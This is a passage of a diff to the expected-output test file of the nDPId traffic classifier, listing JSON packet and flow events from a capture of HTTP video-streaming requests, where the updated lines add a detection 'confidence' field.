 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 01264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="}
 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 01237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 